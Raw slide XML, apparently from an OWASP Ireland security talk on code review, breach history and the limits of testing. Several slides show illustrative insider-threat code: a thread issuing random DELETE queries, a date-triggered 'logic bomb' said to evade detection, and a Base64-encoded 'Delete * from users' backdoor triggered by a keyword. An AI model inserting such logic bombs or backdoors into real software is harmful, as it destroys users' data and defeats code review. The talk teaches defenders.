              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	Random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SecureRandom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	while( true ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		String query = "DELETE " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>sr.nextInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>() + " FROM data";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>c.createStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>( query );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Thread.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>sr.nextInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>() );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		} catch (Exception e) {}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>}}).start();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Base64 Encoding to bypass  input validation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(‘a’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>if(validate(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>){  // Usual input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	String x = new String(new sum.misc.BASE64Decoder().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>decodeBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>x.contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(BASE64.toASCII(“VXN1cnBfRGVsZXRlICogZnJvbSB1c2VycyB3aGVyZSB1c2VyX25hbWUgPSAiYWRtaW4nDQo=”, “usurp”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>System.RunDBquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(x. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" smtClean="0"/>
              <a:t>BASE64.toASCII); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>// execute the malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	…………………….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0" smtClean="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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="711201"/>
            <a:ext cx="7391400" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Logic Bomb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898900" y="787400"/>
            <a:ext cx="1809663" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Time for bomb to set-off</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3441700" y="1079500"/>
            <a:ext cx="546100"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6946901" y="990600"/>
            <a:ext cx="1968500" cy="984885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When This code detects the date is 17/3/2010 it executes a database data corruption routine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997701" y="3721100"/>
            <a:ext cx="1892300" cy="984885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This has no signature a tool can “detect” and probably fool manual reviewers too….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="3619500"/>
            <a:ext cx="802640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994400" y="4533900"/>
            <a:ext cx="3286477" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Usurp_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> * from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "admin'</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6178550" y="4883150"/>
            <a:ext cx="317500" cy="127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268288"/>
            <a:ext cx="8350250" cy="852487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Solution: No single answer</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Both Runtime testing and Static Analysis have their strengths and weaknesses. – we probably need to use both.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>No Silver bullet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Simple authorisation and business logic verification is often overlooked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Most effective approach is to attempt to build secure code during the SDLC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="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1" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1762125"/>
            <a:ext cx="9144000" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36872" name="Picture 11" descr="j0326558"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2603500" y="3055938"/>
            <a:ext cx="1458913" cy="1824037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939800" y="5410200"/>
            <a:ext cx="3544753" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" err="1" smtClean="0"/>
              <a:t>www.OWASP.org/index.php/Ireland</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 5" descr="owasp_logo_122106"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="563563" y="1128713"/>
            <a:ext cx="4970462" cy="1169987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4457700" y="3149600"/>
            <a:ext cx="3076740" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="5400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="5400" b="1" dirty="0">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dirty="0" smtClean="0"/>
              <a:t>The ISSUE…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="969963"/>
            <a:ext cx="8229600" cy="4811712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>More and More application level issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sept/Oct 2008 – SQL Injection $9,000,000 in 24 Hours (RBS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Business Logic Exploited in US Army Servers – May, 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>HSBC and Barclays sites were both hit by major XSS vulnerabilities  - June 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>The Telegraph site was exposed by a severe SQL injection vulnerability - June 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{752AA60A-F460-4560-96E5-7A43F5BC91F5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384800" y="4673600"/>
            <a:ext cx="3337773" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“In the last five years, approximately </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>500 million records containing personal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>identifying information of United States </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>residents stored in government and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>corporate databases was either lost </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or stolen.”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -  “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.identitytheft.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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Things are not improving</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>: XSS was discovered  circa 1996</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Initially is was a curiosity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Evolved to an exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Further evolution to a worm </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>MySPACE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0"/>
              <a:t>- SAMMY WORM 2005</a:t>
            </a:r>
            <a:r>
